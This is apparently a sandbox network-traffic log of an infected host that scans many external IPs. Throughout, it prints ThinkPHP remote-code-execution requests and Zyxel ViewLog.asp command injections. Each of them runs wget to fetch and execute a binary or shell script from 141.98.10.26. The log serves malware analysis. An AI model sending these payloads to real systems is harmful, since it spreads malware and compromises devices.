/></p><hr><address>Apache/2.2.15 (CentOS) Server at 88.198.112.81 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
380	192.168.2.23	42466	88.80.21.3	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:50.667464972 CET	7373	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
381	192.168.2.23	35290	88.87.6.45	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:50.677174091 CET	7373	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:50.893853903 CET	7378	IN	HTTP/1.0 400 Bad Request Connection: Keep-Alive
Nov 22, 2023 08:38:50.893867016 CET	7378	IN	Data Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e Data Ascii: Keep-Alive: timeout=20Content-Type: text/html<h1>Bad Request</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
382	192.168.2.23	57246	94.110.185.58	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:52.389233112 CET	7615	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:53.611090899 CET	7776	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
383	192.168.2.23	38080	95.211.189.220	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.086544037 CET	7667	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:53.262830019 CET	7671	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:38:53 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
384	192.168.2.23	42466	95.216.139.143	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.104291916 CET	7668	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:53.299400091 CET	7682	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Wed, 22 Nov 2023 07:38:53 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
385	192.168.2.23	42482	88.136.242.35	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.289891005 CET	7681	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:53.866961002 CET	7794	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:55.018824100 CET	7937	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:57.290513992 CET	8190	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:01.897835016 CET	8807	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:11.112551928 CET	9882	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:30.053890944 CET	12160	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:06.912719011 CET	16559	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
386	192.168.2.23	55974	31.136.83.93	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.360327005 CET	7766	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:56.522578001 CET	8159	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:02.665802956 CET	8906	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:14.696019888 CET	10354	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:40.292520046 CET	13380	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:29.437621117 CET	19346	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
387	192.168.2.23	56878	94.46.181.166	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.360392094 CET	7767	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:53.963002920 CET	7796	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:54.158276081 CET	7800	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:54 GMT Server: Apache Accept-Ranges: bytes Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-

Session ID	Source IP	Source Port	Destination IP	Destination Port
388	192.168.2.23	58682	62.31.243.187	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.370649099 CET	7767	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:53.576303005 CET	7774	IN	HTTP/1.0 404 Not Found !!! Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-type: text/html <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html> Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
389	192.168.2.23	46362	88.156.111.55	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.498159885 CET	7771	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
390	192.168.2.23	53120	88.86.221.53	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.509331942 CET	7772	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:53.743665934 CET	7790	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 Date: Wed, 22 Nov 2023 07:38:53 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
391	192.168.2.23	49382	31.24.230.11	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.589765072 CET	7776	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
392	192.168.2.23	60336	94.120.222.203	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.641793013 CET	7787	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
393	192.168.2.23	46668	94.122.206.125	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.642357111 CET	7787	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

